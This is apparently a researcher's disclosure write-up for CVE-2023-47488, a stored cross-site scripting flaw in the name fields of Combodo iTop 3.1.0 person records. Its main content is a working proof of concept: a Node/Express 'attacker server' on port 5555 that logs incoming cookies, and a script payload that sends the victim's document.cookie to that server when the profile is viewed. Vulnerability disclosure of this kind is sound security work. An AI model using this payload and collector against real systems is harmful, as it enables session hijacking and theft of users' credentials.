Headline
CVE-2023-47488: bugplorer
Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.
This is the latest version as of November 5, 2023.
First, create a person object.
Use a basic XSS payload.
The script executed for both of field which is Last Name and First Name.
Next, host the attacker server on another port which is port 5555.
// Require express and create an instance of express app
const express = require('express');
const app = express();
// Define a port number
const port = 5555;
// Define a route for GET requests on '/'
app.get('/', (req, res) => {
// Extract the 'get' query parameter
const cookieData = req.query.get;
// Log the cookie data to the console
console.log('Received cookie data:', cookieData);
// Respond with a success message
res.send('Cookie data received');
});
// Start the server
app.listen(port, () => {
console.log(`Server listening at http://localhost:${port}`);
});
Use another XSS payload which send a get request to localhost port 5555 (attacker host).
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:5555/?get=' + encodeURIComponent(document.cookie));
xhr.onload = function() { console.log(xhr.responseText); };
xhr.send();
</script>
Result
Attacker obtain the cookie when victim click on the malicious person profile.